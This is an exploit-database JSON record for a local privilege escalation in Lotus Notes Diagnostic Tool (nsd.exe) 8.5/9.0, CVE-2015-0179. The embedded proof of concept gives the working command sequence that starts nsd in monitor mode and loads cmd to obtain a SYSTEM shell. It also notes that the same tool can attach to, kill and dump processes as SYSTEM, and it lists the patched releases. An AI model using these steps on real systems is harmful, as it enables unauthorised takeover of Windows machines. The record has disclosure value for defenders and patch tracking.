Exploit for Windows platform in category local exploits
{"id": "1337DAY-ID-28417", "type": "zdt", "bulletinFamily": "exploit", "title": "Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation Vulnerability", "description": "Exploit for Windows platform in category local exploits", "published": "2017-09-04T00:00:00", "modified": "2017-09-04T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/28417", "reporter": "ParagonSec", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-09T05:22:27", "viewCount": 9, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-0179"]}]}, "exploitation": null, "vulnersScore": -0.3}, "sourceHref": "https://0day.today/exploit/28417", "sourceData": "# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privilege Escalation\r\n# Date: 02-09-2017\r\n# Exploit Author: ParagonSec\r\n# Website: https://github.com/paragonsec\r\n# Version: 8.5 & 9.0\r\n# Tested on: Windows 7 Enterprise\r\n# CVE: CVE-2015-0179\r\n# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029\r\n# Category: Local & Privilege Escalation Exploit\r\n\r\n\r\n1. Description\r\n\r\nLotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights.\r\nThis can be leveraged to run a program under the System context and elevate\r\nlocal privileges.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nFirst you need to execute nsd.exe under the monitor/CLI mode:\r\n\r\n> nsd.exe -monitor\r\n\r\nNext, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.\r\n\r\nnsd> LOAD CMD\r\n\r\nYou will see that cmd is opened as System now.\r\n\r\nAlso, NSD can be used to attach, kill processes or create memory dumps under the System context.\r\n\r\n\r\n3. Solution:\r\n\r\nThis has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.\n\n# 0day.today [2018-02-09] #", "_state": {"dependencies": 1659958664, "score": 1659788215, "epss": 1678853679}}